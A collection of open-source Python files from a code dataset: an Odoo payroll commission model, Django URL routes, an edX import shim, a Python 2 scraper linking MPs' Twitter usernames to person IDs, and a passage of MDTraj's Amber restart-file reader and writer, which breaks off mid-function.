        for payment in self.browse(cr, uid, ids, context=context):
            if payment.amount_paid <= 0.0:
                return False
        return True

    _columns = {
        # Commission being paid out and its (derived, read-only) invoice.
        'commission_id': fields.many2one('sale.commission.commission', string='Commission'),
        'invoice_id': fields.related('commission_id', 'invoice_id', type='many2one',
            obj='account.invoice', string='Invoice', readonly=True),
        # Payslip input line this payment is attached to, plus its payslip.
        'input_id': fields.many2one('hr.payslip.input', ondelete='restrict', string='Input'),
        'slip_id':fields.related('input_id', 'payslip_id', type='many2one',
            string='Payslip', obj='hr.payslip', readonly=True, store=True),
        'amount_paid': fields.float('Amount Paid', digits=(16,2)),
    }
_constraints = [(_check_amount_paid, 'Value must be greater or equal than 0.', ['amount_paid'])] | sysadminmatmoz/odoo-clearcorp | TODO-8.0/hr_payroll_pay_commission/hr_payroll_pay_commission.py | Python | agpl-3.0 | 2,121 |
# Copyright (c) 2011, 2012 Free Software Foundation
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# This project incorporates work covered by the following copyright and permission notice:
# Copyright (c) 2009, Julien Fache
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the author nor the names of other
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
# Copyright (c) 2011, 2012 Free Software Foundation
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Urls for Objectapp forms"""
from django.conf.urls.defaults import url
from django.conf.urls.defaults import patterns
urlpatterns = patterns('objectapp.views.add',
                       url(r'^gbobject/$', 'addgbobject',
                           name='objectapp_add_gbobject'),
                       # BUGFIX: this url previously reused the name
                       # 'objectapp_add_gbobject' (copy-paste from the entry
                       # above), which made reverse() lookups for the process
                       # form ambiguous. It now follows the same
                       # 'objectapp_add_<view>' convention as its siblings.
                       url(r'^process/$', 'addprocess',
                           name='objectapp_add_process'),
                       url(r'^system/$', 'addsystem',
                           name='objectapp_add_system'),
                       )
| gnowgi/gnowsys-studio | objectapp/urls/add.py | Python | agpl-3.0 | 3,741 |
"""Deprecated import support. Auto-generated by import_shims/generate_shims.sh."""
# pylint: disable=redefined-builtin,wrong-import-position,wildcard-import,useless-suppression,line-too-long
from import_shims.warn import warn_deprecated_import
warn_deprecated_import('discussion.rest_api.tests.test_pagination', 'lms.djangoapps.discussion.rest_api.tests.test_pagination')
from lms.djangoapps.discussion.rest_api.tests.test_pagination import *
| eduNEXT/edunext-platform | import_shims/lms/discussion/rest_api/tests/test_pagination.py | Python | agpl-3.0 | 446 |
#!/usr/bin/python
# NOTE(review): Python 2 script — urllib2 does not exist on Python 3.
import urllib2
import csv
import xml.sax

# Public Google Spreadsheet exported as CSV; columns include the member URL,
# a member/office id (column 3) and a twitter username (column 5) — inferred
# from the indexing further below, confirm against the live sheet.
uri = "http://spreadsheets.google.com/tq?tqx=out:csv&key=0AjWA_TWMI4t_dFI5MWRWZkRWbFJ6MVhHQzVmVndrZnc&hl=en_GB"
f = urllib2.urlopen(uri)
csv_data = f.read()
lines = csv_data.split("\n")
# Parse the downloaded CSV text line-by-line into rows of fields.
rows = csv.reader(lines.__iter__(), delimiter=',', quotechar='"')
class PeopleParser(xml.sax.handler.ContentHandler):
    """SAX content handler that builds a mapping from each <office> id to
    the id of the <person> element enclosing it."""

    def __init__(self):
        self.parser = xml.sax.make_parser()
        self.parser.setContentHandler(self)

    def parse(self, filename):
        # Reset the mapping so the same handler can parse several files.
        self.office_id_to_person_id = {}
        self.parser.parse(filename)

    def startElement(self, name, attrs):
        if name == 'office':
            # Offices are nested inside their <person>, so the person id
            # seen most recently is the holder of this office.
            self.office_id_to_person_id[attrs['id']] = self.current_person_id
        elif name == 'person':
            self.current_person_id = attrs['id']

    def endElement(self, name):
        if name != 'person':
            return
        self.current_person_id = None
people_parser = PeopleParser()
people_parser.parse("../members/people.xml")
person_id_to_twitter_username = {}
output_filename = "../members/twitter-commons.xml"
fp = open(output_filename,"w")
fp.write('''<?xml version="1.0" encoding="ISO-8859-1"?>
<publicwhip>
''')
for r in rows:
if len(r) < 5:
continue
member_id = r[2]
twitter_username = r[4]
if member_id == "url":
# That's the header line...
continue
if len(twitter_username) == 0:
continue
if member_id not in people_parser.office_id_to_person_id:
raise "No person ID found for %s in line %s" % (member_id,"#".join(r))
person_id = people_parser.office_id_to_person_id[member_id]
fp.write("<personinfo id=\"%s\" twitter_username=\"%s\"/>\n"%(person_id,twitter_username))
fp.write("</publicwhip>")
| henare/parlparse | pyscraper/gettwittermps.py | Python | agpl-3.0 | 1,744 |
##############################################################################
# MDTraj: A Python Library for Loading, Saving, and Manipulating
# Molecular Dynamics Trajectories.
# Copyright 2012-2014 Stanford University and the Authors
#
# Authors: Jason Swails
# Contributors:
#
# This code for reading Amber restart and inpcrd files was taken from ParmEd,
# which is released under the GNU Lesser General Public License
#
# MDTraj is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with MDTraj. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
"""
This module provides the ability to read Amber inpcrd/restart files as well as
Amber NetCDF restart files. This code was taken from ParmEd and simplified by
removing the functionality that is not needed.
"""
from __future__ import print_function, division
from distutils.version import StrictVersion
from math import ceil
import os
import warnings
import numpy as np
from mdtraj import version
from mdtraj.formats.registry import FormatRegistry
from mdtraj.utils import ensure_type, import_, in_units_of, cast_indices, six
__all__ = ['AmberRestartFile', 'load_restrt', 'AmberNetCDFRestartFile',
'load_ncrestrt']
range = six.moves.range
@FormatRegistry.register_loader('.rst7')
@FormatRegistry.register_loader('.restrt')
@FormatRegistry.register_loader('.inpcrd')
def load_restrt(filename, top=None, atom_indices=None):
    """Load an AMBER ASCII restart/inpcrd file. Since this file doesn't contain
    information to specify the topology, you need to supply a topology
    Parameters
    ----------
    filename : str
        name of the AMBER restart file
    top : {str, Trajectory, Topology}
        Pass in either the path to a file containing topology information (e.g.,
        a PDB, an AMBER prmtop, or certain types of Trajectory objects) to
        supply the necessary topology information that is not present in these
        files
    atom_indices : array_like, optional
        If not None, then read only a subset of the atoms coordinates from the
        file.
    Returns
    -------
    trajectory : md.Trajectory
        The resulting trajectory, as an md.Trajectory object
    See Also
    --------
    mdtraj.AmberRestartFile : Low level interface to AMBER restart files
    """
    # Imported lazily to avoid a circular import with mdtraj.core.trajectory.
    from mdtraj.core.trajectory import _parse_topology

    parsed_top = _parse_topology(top)
    indices = cast_indices(atom_indices)
    with AmberRestartFile(filename) as fh:
        return fh.read_as_traj(parsed_top, atom_indices=indices)
@FormatRegistry.register_fileobject('.rst7')
@FormatRegistry.register_fileobject('.restrt')
@FormatRegistry.register_fileobject('.inpcrd')
class AmberRestartFile(object):
    """Interface for reading and writing AMBER ASCII restart files. This is a
    file-like object, that supports both reading and writing depending on the
    `mode` flag. It implements the context manager protocol, so you can also
    use it with the python 'with' statement.
    Parameters
    ----------
    filename : str
        The name of the file to open
    mode : {'r', 'w'}, default='r'
        The mode in which to open the file. Valid options are 'r' or 'w' for
        'read' or 'write'
    force_overwrite : bool, default=False
        In write mode, if a file named `filename` already exists, clobber it and
        overwrite it
    See Also
    --------
    md.AmberNetCDFRestartFile : Low level interface to AMBER NetCDF-format
        restart files
    """
    distance_unit = 'angstroms'
    def __init__(self, filename, mode='r', force_overwrite=True):
        self._closed = True
        self._mode = mode
        self._filename = filename
        if mode not in ('r', 'w'):
            raise ValueError("mode must be one of ['r', 'w']")
        if mode == 'w' and not force_overwrite and os.path.exists(filename):
            raise IOError('"%s" already exists' % filename)
        if mode == 'w':
            self._needs_initialization = True
            self._handle = open(filename, mode)
            self._closed = False
        elif mode == 'r':
            # Sniff the file: line 2 of an Amber restart starts with the atom
            # count; failure to parse it means this is not a restart file.
            with open(filename, mode) as f:
                f.readline()
                words = f.readline().split()
            try:
                self._n_atoms = int(words[0])
            except (IndexError, ValueError):
                raise TypeError('"%s" is not a recognized Amber restart' %
                                filename)
            self._needs_initialization = False
        else:
            raise RuntimeError()
    @property
    def n_atoms(self):
        self._validate_open()
        if self._needs_initialization:
            raise IOError('The file is uninitialized')
        return self._n_atoms
    @property
    def n_frames(self):
        return 1 # always 1 frame
    def _validate_open(self):
        if self._closed:
            raise IOError('The file is closed.')
    def _parse(self, lines):
        """ Parses the file """
        self._time = None
        try:
            words = lines[1].split()
            self._n_atoms = natom = int(words[0])
        except (IndexError, ValueError):
            raise TypeError('not a recognized Amber restart')
        time = None
        if len(words) >= 2:
            time = float(words[1])
        # Coordinates are written 2 atoms (6 fields of 12 chars) per line.
        lines_per_frame = int(ceil(natom / 2))
        if len(lines) == lines_per_frame + 2:
            hasbox = hasvels = False
        elif natom in (1, 2) and len(lines) == 4:
            # This is the _only_ case where line counting does not work -- there
            # is either 1 or 2 atoms and there are 4 lines. The 1st 3 lines are
            # the title, natom/time, and coordinates. The 4th are almost always
            # velocities since it's hard to have a periodic system this small.
            # However, velocities (which are scaled down by 20.445) have a ~0%
            # chance of being 60+, so we can pretty easily tell if the last line
            # has box dimensions and angles or velocities. I cannot envision a
            # plausible scenario where the detection here will ever fail
            line = lines[3]
            if natom == 1:
                tmp = [line[i:i+12] for i in range(0, 72, 12) if
                       line[i:i+12].strip()]
                if len(tmp) == 3:
                    hasvels = True
                    hasbox = False
                elif len(tmp) == 6:
                    hasbox = True
                    hasvels = False
                else:
                    raise TypeError('not a recognized Amber restart')
            else:
                # Ambiguous case
                tmp = [float(line[i:i+12]) >= 60.0 for i in range(0, 72, 12)]
                if any(tmp):
                    hasbox = True
                    hasvels = False
                else:
                    hasvels = True
                    hasbox = False
        elif len(lines) == lines_per_frame + 3:
            hasbox = True
            hasvels = False
        elif len(lines) == 2*lines_per_frame + 2:
            hasbox = False
            hasvels = True
        elif len(lines) == 2*lines_per_frame + 3:
            hasbox = hasvels = True
        else:
            raise TypeError('Badly formatted restart file. Has %d lines for '
                            '%d atoms' % (len(lines), natom))
        coordinates = np.zeros((1, natom, 3))
        if time is None:
            time = np.zeros(1)
        else:
            time = np.asarray((time,))
        # Fill the coordinates
        for i in range(lines_per_frame):
            line = lines[i+2] # Skip first two lines
            i2 = i * 2
            coordinates[0,i2,:] = [float(line[j:j+12]) for j in range(0,36,12)]
            i2 += 1
            if i2 < natom:
                coordinates[0,i2,:] = [float(line[j:j+12]) for j in
                                       range(36,72,12)]
        if hasbox:
            cell_lengths = np.zeros((1,3))
            cell_angles = np.zeros((1,3))
            line = lines[-1]
            cell_lengths[0,:] = [float(line[i:i+12]) for i in range(0,36,12)]
            cell_angles[0,:] = [float(line[i:i+12]) for i in range(36,72,12)]
        else:
            cell_lengths = cell_angles = None
        return coordinates, time, cell_lengths, cell_angles
    def read_as_traj(self, topology, atom_indices=None):
        """Read an AMBER ASCII restart file as a trajectory.
        Parameters
        ----------
        topology : Topology
            The system topology
        atom_indices : array_like, optional
            If not none, then read only a subset of the atoms coordinates from the
            file. This may be slightly slower than the standard read because it required
            an extra copy, but will save memory.
        Returns
        -------
        trajectory : Trajectory
            A trajectory object with 1 frame created from the file.
        """
        from mdtraj.core.trajectory import Trajectory
        if atom_indices is not None:
            topology = topology.subset(atom_indices)
        xyz, time, cell_lengths, cell_angles = self.read(atom_indices=atom_indices)
        xyz = in_units_of(xyz, self.distance_unit, Trajectory._distance_unit,
                          inplace=True)
        cell_lengths = in_units_of(cell_lengths, self.distance_unit,
                                   Trajectory._distance_unit, inplace=True)
        return Trajectory(xyz=xyz, topology=topology, time=time,
                          unitcell_lengths=cell_lengths,
                          unitcell_angles=cell_angles)
    def read(self, atom_indices=None):
        r"""Read data from an AMBER ASCII restart file
        Parameters
        ----------
        atom_indices : np.ndarray, dtype=int, optional
            The specific indices of the atoms you'd like to retrieve. If not
            supplied, all of the atoms will be retrieved.
        Returns
        -------
        coordinates : np.ndarray, shape=(1, n_atoms, 3)
            The cartesian coordinates of the atoms, in units of angstroms. These
            files only ever contain 1 frame
        time : np.ndarray, None
            The time corresponding to the frame, in units of picoseconds, or
            None if no time information is present
        cell_lengths : np.ndarray, None
            The lengths (a, b, c) of the unit cell for the frame in angstroms,
            or None if the information is not present in the file
        cell_angles : np.ndarray, None
            The angles (\alpha, \beta, \gamma) defining the unit cell for each
            frame, or None if the information is not present in the file.
        """
        if self._mode != 'r':
            raise IOError('The file was opened in mode=%s. Reading is not '
                          'allowed.' % self._mode)
        with open(self._filename, 'r') as f:
            lines = f.readlines()
        coordinates, time, cell_lengths, cell_angles = self._parse(lines)
        if atom_indices is not None:
            # dtype=int rather than the removed np.int alias (np.int was a
            # plain alias for the builtin int, so behavior is unchanged).
            atom_slice = ensure_type(atom_indices, dtype=int, ndim=1,
                                     name='atom_indices', warn_on_cast=False)
            # BUGFIX: compare elementwise *inside* np.all(). The old form
            # `not np.all(atom_slice) >= 0` compared a boolean to 0, which is
            # always True, so the validation could never fire.
            if not np.all(atom_slice >= 0):
                raise ValueError('Entries in atom_slice must be >= 0')
            coordinates = coordinates[:, atom_slice, :]
        return coordinates, time, cell_lengths, cell_angles
    def write(self, coordinates, time=None, cell_lengths=None,
              cell_angles=None):
        """Write one frame of a MD trajectory to disk in the AMBER ASCII restart
        file format.
        Parameters
        ----------
        coordinates : np.ndarray, dtype=np.float32, shape=([1,] n_atoms, 3)
            The cartesian coordinates of each atom, in units of angstroms. Must
            be only a single frame (shape can be (1,N,3) or (N,3) where N is
            the number of atoms)
        time : array-like with 1 element or float, optional
            The time corresponding to this frame. If not specified, a place
            holder of 0 will be written
        cell_lengths : np.ndarray, dtype=np.double, shape=([1,] 3)
            The lengths (a,b,c) of the unit cell for the frame in Angstroms
        cell_angles : np.ndarray, dtype=np.double, shape=([1,] 3)
            The angles between the unit cell vectors for the frame in Degrees
        """
        if self._mode != 'w':
            raise IOError('The file was opened in mode=%s. Writing not allowed.'
                          % self._mode)
        if not self._needs_initialization:
            # Must have already been written -- can only write once
            raise RuntimeError('restart file has already been written -- can '
                               'only write one frame to restart files.')
        # These are no-ops.
        # coordinates = in_units_of(coordinates, None, 'angstroms')
        # time = in_units_of(time, None, 'picoseconds')
        # cell_lengths = in_units_of(cell_lengths, None, 'angstroms')
        # cell_angles = in_units_of(cell_angles, None, 'degrees')
        # typecheck all of the input arguments rigorously
        coordinates = ensure_type(coordinates, np.float32, 3, 'coordinates',
                                  length=None, can_be_none=False,
                                  shape=(1,None,3), warn_on_cast=False,
                                  add_newaxis_on_deficient_ndim=True)
        n_frames, self._n_atoms = coordinates.shape[0], coordinates.shape[1]
        if n_frames != 1:
            raise ValueError('Can only write 1 frame to a restart file!')
        if time is not None:
            try:
                time = float(time)
            except TypeError:
                raise TypeError('Can only provide a single time')
        else:
            time = 0.0
        cell_lengths = ensure_type(cell_lengths, np.float64, 2, 'cell_lengths',
                                   length=1, can_be_none=True,
                                   warn_on_cast=False,
                                   add_newaxis_on_deficient_ndim=True)
        cell_angles = ensure_type(cell_angles, np.float64, 2, 'cell_angles',
                                  length=1, can_be_none=True,
                                  warn_on_cast=False,
                                  add_newaxis_on_deficient_ndim=True)
        if ((cell_lengths is None and cell_angles is not None) or
            (cell_lengths is not None and cell_angles is None)):
            prov, negl = 'cell_lengths', 'cell_angles'
            if cell_lengths is None:
                prov, negl = negl, prov
            raise ValueError('You provided the variable "%s" but did not '
                             'provide "%s". Either provide both or neither -- '
                             'one without the other is meaningless.' %
                             (prov, negl))
        self._handle.write('Amber restart file (without velocities) written by '
                           'MDTraj\n')
        self._handle.write('%5d%15.7e\n' % (self._n_atoms, time))
        fmt = '%12.7f%12.7f%12.7f'
        # Two atoms (6 fields) per line, per the Amber restart format.
        for i in range(self._n_atoms):
            acor = coordinates[0, i, :]
            self._handle.write(fmt % (acor[0], acor[1], acor[2]))
            if i % 2 == 1: self._handle.write('\n')
        if self._n_atoms % 2 == 1: self._handle.write('\n')
        if cell_lengths is not None:
            # Box lengths and angles share a single 6-field line.
            self._handle.write(fmt % (cell_lengths[0,0], cell_lengths[0,1],
                                      cell_lengths[0,2]))
            self._handle.write(fmt % (cell_angles[0,0], cell_angles[0,1],
                                      cell_angles[0,2]) + '\n')
        self._handle.flush()
    def __enter__(self):
        return self
    def __exit__(self, *exc_info):
        self.close()
    def close(self):
        if not self._closed and hasattr(self, '_handle'):
            self._handle.close()
        self._closed = True
    def __del__(self):
        self.close()
    def __len__(self):
        return 1 # All restarts have only 1 frame
@FormatRegistry.register_loader('.ncrst')
def load_ncrestrt(filename, top=None, atom_indices=None):
    """Load an AMBER NetCDF restart/inpcrd file. Since this file doesn't
    contain information to specify the topology, you need to supply a topology
    Parameters
    ----------
    filename : str
        name of the AMBER restart file
    top : {str, Trajectory, Topology}
        Pass in either the path to a file containing topology information (e.g.,
        a PDB, an AMBER prmtop, or certain types of Trajectory objects) to
        supply the necessary topology information that is not present in these
        files
    atom_indices : array_like, optional
        If not None, then read only a subset of the atoms coordinates from the
        file.
    Returns
    -------
    trajectory : md.Trajectory
        The resulting trajectory, as an md.Trajectory object
    See Also
    --------
    mdtraj.AmberRestartFile : Low level interface to AMBER restart files
    """
    # Imported lazily to avoid a circular import with mdtraj.core.trajectory.
    from mdtraj.core.trajectory import _parse_topology

    parsed_top = _parse_topology(top)
    indices = cast_indices(atom_indices)
    with AmberNetCDFRestartFile(filename) as fh:
        return fh.read_as_traj(parsed_top, atom_indices=indices)
@FormatRegistry.register_fileobject('.ncrst')
class AmberNetCDFRestartFile(object):
    """Interface for reading and writing AMBER NetCDF files. This is a file-like
    object, that supports both reading and writing depending on the `mode` flag.
    It implements the context manager protocol, so you can also use it with the
    python 'with' statement.
    Parameters
    ----------
    filename : str
        The name of the file to open
    mode : {'r', 'w'}, default='r'
        The mode in which to open the file. Valid options are 'r' or 'w' for
        'read' or 'write'
    force_overwrite : bool, default=False
        In write mode, if a file named `filename` already exists, clobber it and
        overwrite it
    """
    distance_unit = 'angstroms'
    def __init__(self, filename, mode='r', force_overwrite=False):
        self._closed = True
        self._mode = mode
        if StrictVersion(import_('scipy.version').short_version) < StrictVersion('0.12.0'):
            raise ImportError('MDTraj NetCDF support requires scipy>=0.12.0. '
                              'You have %s' % import_('scipy.version').short_version)
        netcdf = import_('scipy.io').netcdf_file
        if mode not in ('r', 'w'):
            raise ValueError("mode must be one of ['r', 'w']")
        if mode == 'w' and not force_overwrite and os.path.exists(filename):
            raise IOError('"%s" already exists' % filename)
        # AMBER uses the NetCDF3 format, with 64 bit encodings, which for
        # scipy.io.netcdf_file is "version=2"
        self._handle = netcdf(filename, mode=mode, version=2)
        self._closed = False
        if mode == 'w':
            self._needs_initialization = True
        elif mode == 'r':
            self._needs_initialization = False
        else:
            raise RuntimeError()
    @property
    def n_atoms(self):
        self._validate_open()
        if self._needs_initialization:
            raise IOError('The file is uninitialized')
        return self._handle.dimensions['atom']
    @property
    def n_frames(self):
        return 1 # always 1 frame
    def _validate_open(self):
        if self._closed:
            raise IOError('The file is closed.')
    def read_as_traj(self, topology, atom_indices=None):
        """Read an AMBER ASCII restart file as a trajectory.
        Parameters
        ----------
        topology : Topology
            The system topology
        atom_indices : array_like, optional
            If not none, then read only a subset of the atoms coordinates from the
            file. This may be slightly slower than the standard read because it required
            an extra copy, but will save memory.
        Returns
        -------
        trajectory : Trajectory
            A trajectory object with 1 frame created from the file.
        """
        from mdtraj.core.trajectory import Trajectory
        if atom_indices is not None:
            topology = topology.subset(atom_indices)
        xyz, time, cell_lengths, cell_angles = self.read(atom_indices=atom_indices)
        xyz = in_units_of(xyz, self.distance_unit, Trajectory._distance_unit,
                          inplace=True)
        cell_lengths = in_units_of(cell_lengths, self.distance_unit,
                                   Trajectory._distance_unit, inplace=True)
        return Trajectory(xyz=xyz, topology=topology, time=time,
                          unitcell_lengths=cell_lengths,
                          unitcell_angles=cell_angles)
    def read(self, atom_indices=None):
        r"""Read data from an AMBER NetCDF restart file
        Parameters
        ----------
        atom_indices : np.ndarray, dtype=int, optional
            The specific indices of the atoms you'd like to retrieve. If not
            supplied, all of the atoms will be retrieved.
        Returns
        -------
        coordinates : np.ndarray, shape=(1, n_atoms, 3)
            The cartesian coordinates of the atoms, in units of angstroms. These
            files only ever contain 1 frame
        time : np.ndarray, None
            The time corresponding to the frame, in units of picoseconds, or
            None if no time information is present
        cell_lengths : np.ndarray, None
            The lengths (a, b, c) of the unit cell for the frame in angstroms,
            or None if the information is not present in the file
        cell_angles : np.ndarray, None
            The angles (\alpha, \beta, \gamma) defining the unit cell for each
            frame, or None if the information is not present in the file.
        Notes
        -----
        If the file is not a NetCDF file with the appropriate convention, a
        TypeError is raised. If variables that are needed do not exist or if
        illegal values are passed in for parameters, ValueError is raised. If
        I/O errors occur, IOError is raised.
        """
        if self._mode != 'r':
            raise IOError('The file was opened in mode=%s. Reading is not '
                          'allowed.' % self._mode)
        if 'coordinates' not in self._handle.variables:
            raise ValueError('No coordinates found in the NetCDF file.')
        # Check that conventions are correct
        try:
            conventions = self._handle.Conventions.decode('ascii')
        except AttributeError:
            # BUGFIX: a file without a Conventions attribute previously raised
            # an uncaught AttributeError here, before the (dead) hasattr()
            # check further down could run. Mirror the ConventionVersion
            # handling below and raise TypeError instead.
            raise TypeError('NetCDF file does not have Conventions')
        except UnicodeDecodeError:
            raise TypeError('NetCDF file does not have correct Conventions')
        try:
            convention_version = self._handle.ConventionVersion.decode('ascii')
        except UnicodeDecodeError:
            raise ValueError('NetCDF file does not have correct ConventionVersion')
        except AttributeError:
            raise TypeError('NetCDF file does not have ConventionVersion')
        if conventions != 'AMBERRESTART':
            raise TypeError('NetCDF file does not have correct Conventions')
        if convention_version != '1.0':
            raise ValueError('NetCDF restart has ConventionVersion %s. Only '
                             'Version 1.0 is supported.' % convention_version)
        if atom_indices is not None:
            # dtype=int rather than the removed np.int alias (np.int was a
            # plain alias for the builtin int, so behavior is unchanged).
            atom_slice = ensure_type(atom_indices, dtype=int, ndim=1,
                                     name='atom_indices', warn_on_cast=False)
            # BUGFIX: compare elementwise *inside* np.all(). The old form
            # `not np.all(atom_slice) >= 0` compared a boolean to 0, which is
            # always True, so the validation could never fire.
            if not np.all(atom_slice >= 0):
                raise ValueError('Entries in atom_slice must be >= 0')
            coordinates = self._handle.variables['coordinates'][atom_slice, :]
        else:
            coordinates = self._handle.variables['coordinates'][:, :]
        # Get unit cell parameters
        if 'cell_lengths' in self._handle.variables:
            cell_lengths = self._handle.variables['cell_lengths'][:]
        else:
            cell_lengths = None
        if 'cell_angles' in self._handle.variables:
            cell_angles = self._handle.variables['cell_angles'][:]
        else:
            cell_angles = None
        # BUGFIX: the two warning messages below were swapped -- each one
        # described the opposite situation from the one being detected.
        if cell_lengths is None and cell_angles is not None:
            warnings.warn('cell_angles were found, but no cell_lengths')
        if cell_lengths is not None and cell_angles is None:
            warnings.warn('cell_lengths were found, but no cell_angles')
        if 'time' in self._handle.variables:
            time = self._handle.variables['time'].getValue()
        else:
            time = None
        # scipy.io.netcdf variables are mem-mapped, and are only backed by valid
        # memory while the file handle is open. This is _bad_ because we need to
        # support the user opening the file, reading the coordinates, and then
        # closing it, and still having the coordinates be a valid memory
        # segment.
        # https://github.com/mdtraj/mdtraj/issues/440
        if coordinates is not None and not coordinates.flags['WRITEABLE']:
            coordinates = np.array(coordinates, copy=True)
        if cell_lengths is not None and not cell_lengths.flags['WRITEABLE']:
            cell_lengths = np.array(cell_lengths, copy=True)
        if cell_angles is not None and not cell_angles.flags['WRITEABLE']:
            cell_angles = np.array(cell_angles, copy=True)
        # The leading frame dimension is missing on all of these arrays since
        # restart files have only one frame. Reshape them to add this extra
        # dimension
        coordinates = coordinates[np.newaxis,:]
        if cell_lengths is not None:
            cell_lengths = cell_lengths[np.newaxis,:]
        if cell_angles is not None:
            cell_angles = cell_angles[np.newaxis,:]
        if time is not None:
            time = np.asarray([time,])
        return coordinates, time, cell_lengths, cell_angles
    def write(self, coordinates, time=None, cell_lengths=None,
              cell_angles=None):
        """Write one frame of a MD trajectory to disk in the AMBER NetCDF
        restart file format.
        Parameters
        ----------
        coordinates : np.ndarray, dtype=np.float32, shape=([1,] n_atoms, 3)
            The cartesian coordinates of each atom, in units of angstroms. Must
            be only a single frame (shape can be (1,N,3) or (N,3) where N is
            the number of atoms)
        time : array-like with 1 element or float, optional
            The time corresponding to this frame. If not specified, a place
            holder of 0 will be written
        cell_lengths : np.ndarray, dtype=np.double, shape=([1,] 3)
            The lengths (a,b,c) of the unit cell for the frame in Angstroms
        cell_angles : np.ndarray, dtype=np.double, shape=([1,] 3)
            The angles between the unit cell vectors for the frame in Degrees
        Notes
        -----
        You must only have one frame to write to this file.
        """
        if self._mode != 'w':
            raise IOError('The file was opened in mode=%s. Writing not allowed.'
                          % self._mode)
        if not self._needs_initialization:
            # Must have already been written -- can only write once
            raise RuntimeError('NetCDF restart file has already been written '
                               '-- can only write one frame to restart files.')
        # these are no-ops
        # coordinates = in_units_of(coordinates, None, 'angstroms')
        # time = in_units_of(time, None, 'picoseconds')
        # cell_lengths = in_units_of(cell_lengths, None, 'angstroms')
        # cell_angles = in_units_of(cell_angles, None, 'degrees')
        # typecheck all of the input arguments rigorously
        coordinates = ensure_type(coordinates, np.float32, 3, 'coordinates',
                                  length=None, can_be_none=False,
                                  shape=(1,None,3), warn_on_cast=False,
                                  add_newaxis_on_deficient_ndim=True)
        n_frames, n_atoms = coordinates.shape[0], coordinates.shape[1]
        if n_frames != 1:
            raise ValueError('Can only write 1 frame to a restart file!')
        if time is not None:
            try:
                time = float(time)
            except TypeError:
                raise TypeError('Can only provide a single time')
        else:
            time = 0.0
        cell_lengths = ensure_type(cell_lengths, np.float64, 2, 'cell_lengths',
                                   length=1, can_be_none=True,
                                   warn_on_cast=False,
                                   add_newaxis_on_deficient_ndim=True)
        cell_angles = ensure_type(cell_angles, np.float64, 2, 'cell_angles',
                                  length=1, can_be_none=True,
                                  warn_on_cast=False,
                                  add_newaxis_on_deficient_ndim=True)
        if ((cell_lengths is None and cell_angles is not None) or
            (cell_lengths is not None and cell_angles is None)):
            prov, negl = 'cell_lengths', 'cell_angles'
            if cell_lengths is None:
                prov, negl = negl, prov
            raise ValueError('You provided the variable "%s" but did not '
                             'provide "%s". Either provide both or neither -- '
                             'one without the other is meaningless.' %
                             (prov, negl))
        self._initialize_headers(n_atoms=n_atoms,
                                 set_coordinates=True,
                                 set_time=(time is not None),
                                 set_cell=(cell_lengths is not None))
        self._needs_initialization = False
        # Write the time, coordinates, and box info
        if time is not None:
            self._handle.variables['time'][0] = float(time)
        self._handle.variables['coordinates'][:,:] = coordinates[0,:,:]
        if cell_lengths is not None:
            self._handle.variables['cell_angles'][:] = cell_angles[0,:]
            self._handle.variables['cell_lengths'][:] = cell_lengths[0,:]
        self.flush()
    def _initialize_headers(self, n_atoms, set_coordinates, set_time, set_cell):
        """Initialize the headers and convention properties of the NetCDF
        restart file
        """
        ncfile = self._handle
        ncfile.Conventions = 'AMBERRESTART'
        ncfile.ConventionVersion = "1.0"
        ncfile.title = 'NetCDF Restart file written by MDTraj w/out velocities'
        ncfile.application = 'Omnia'
        ncfile.program = 'MDTraj'
        ncfile.programVersion = version.short_version
        # Dimensions
        ncfile.createDimension('spatial', 3)
        ncfile.createDimension('atom', n_atoms)
        if set_cell:
            ncfile.createDimension('cell_spatial', 3)
            ncfile.createDimension('label', 5)
            ncfile.createDimension('cell_angular', 3)
        if set_time:
            ncfile.createDimension('time', 1)
        # Variables
